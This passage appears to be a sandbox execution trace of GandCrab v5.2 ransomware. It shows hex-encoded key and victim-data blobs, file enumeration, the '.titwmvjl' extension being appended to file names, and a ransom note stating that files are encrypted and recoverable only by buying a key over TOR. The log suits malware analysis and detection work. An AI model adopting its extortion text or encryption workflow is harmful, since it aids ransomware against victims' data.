x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.319] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0072.319] CloseHandle (hObject=0x2c4) returned 1 [0072.320] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.320] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.320] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x27d)) [0072.320] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.320] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.320] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.321] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a09d2ca4deb61a.lock") returned 86 [0072.321] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0072.321] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.322] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.322] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\") returned 62 [0072.322] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*" [0072.322] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503338 [0072.322] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.322] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.323] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.323] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.323] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.323] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.323] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.323] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a09d2ca4deb61a.lock" [0072.323] lstrlenW (lpString=".titwmvjl") returned 9 [0072.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a09d2ca4deb61a.lock") returned 86 [0072.323] VirtualAlloc (lpAddress=0x0, dwSize=0xec, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.323] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 95 [0072.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a09d2ca4deb61a.lock") returned 86 [0072.323] lstrlenW (lpString=".lock") returned 5 [0072.323] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.323] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.324] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.324] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.324] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.324] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0072.324] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0072.324] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\", lpString2="en-US" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" [0072.324] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\" [0072.324] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.324] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.325] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.325] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.325] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.325] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.325] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.325] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\\\TITWMVJL-DECRYPT.txt") returned 89 [0072.325] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0072.327] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\